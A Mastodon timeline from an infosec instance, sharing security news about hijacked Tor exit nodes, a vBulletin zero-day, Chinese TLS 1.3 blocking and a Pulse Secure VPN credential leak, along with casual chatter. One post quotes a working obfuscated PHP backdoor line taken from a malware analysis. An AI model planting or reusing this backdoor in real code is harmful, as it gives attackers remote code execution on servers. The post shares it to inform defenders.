A mysterious group has hijacked Tor exit nodes to perform SSL stripping attacks

The group ran almost a quarter of all Tor exit nodes. Group still controls 10% of all Tor exit nodes today.

@protonmail Could this explain the attack I reported you ?

zdnet.com/google-amp/article/a

Bad news for vBulletin users:

A security researcher has published yesterday details and exploit code for a vBulletin zero-day

- PoCs available in Bash, Python, and Ruby
- Zero-day is a bypass for CVE-2019-16759, a previous vBulletin zero-day, disclosed in Sep 2019

zdnet.com/article/security-res

Need to dust off my OSINT tools.

Does anyone want a small privacy check? Results won't be published.

Feel free to reach out.

WeldPond talking about how 90's hacking helped bring about red-teaming youtube.com/watch?v=hbG2I8Vz49

Fun trivia: that wall of monitors behind him is part of a permanent art installation at Veracode's offices, and was created by a handful of people as part of a Hackathon project -- because our hackathons are cooler than yours (probably) :-P

China is now blocking all encrypted HTTPS traffic that uses TLS 1.3 and ESNI.

zdnet.com/article/china-is-now

Not unexpected, and might be the the first one many countries/companies blocking it.

Crazily Obfuscated PHP backdoor:

if(md5(@$_REQUEST['_p'].'9doijoFp6B2svk2XAhpUl')=='9518e40685a1e104da755c294e656731'){$filter1=$_REQUEST['_f1'];$filter2=$_REQUEST['_f2'];$res=$filter1('',$filter2($_REQUEST['_i']));$res();}

Decoded and information here:

blog.sucuri.net/2020/08/php-ba

New video!
I chat a little about LibreWolf, a 'freer' browser based on Firefox.
youtu.be/6lnG-YD_qNQ

A hacker has published today a list of plaintext usernames and passwords, along with IP addresses for more than 900 Pulse Secure VPN enterprise servers.

According to a review, the list includes:

IP addresses of Pulse Secure VPN servers
Pulse Secure VPN server firmware version
SSH keys for each server
A list of all local users and their password hashes
Admin account details
Last VPN logins (including usernames and cleartext passwords)
VPN session cookies

zdnet.com/article/hacker-leaks

"What's the use of a good quotation if you can't change it?"
-- The Doctor

Ageists make me giggle. Hopefully one day they grow up.

> For example my instance mastodon.technology just added a rule:
> * No unsolicited advice to strangers.

we did it, we ended reply guys

Computer science math shitpost 

@gudenau I'm really tempted to write a micro sci-fi story where "the A20 Gate" opens a portal to another dimension ;)

I found this awesome monitor at the dump. Completes this retro setup.

Show more
Infosec Exchange

A Mastodon instance for info/cyber security-minded people.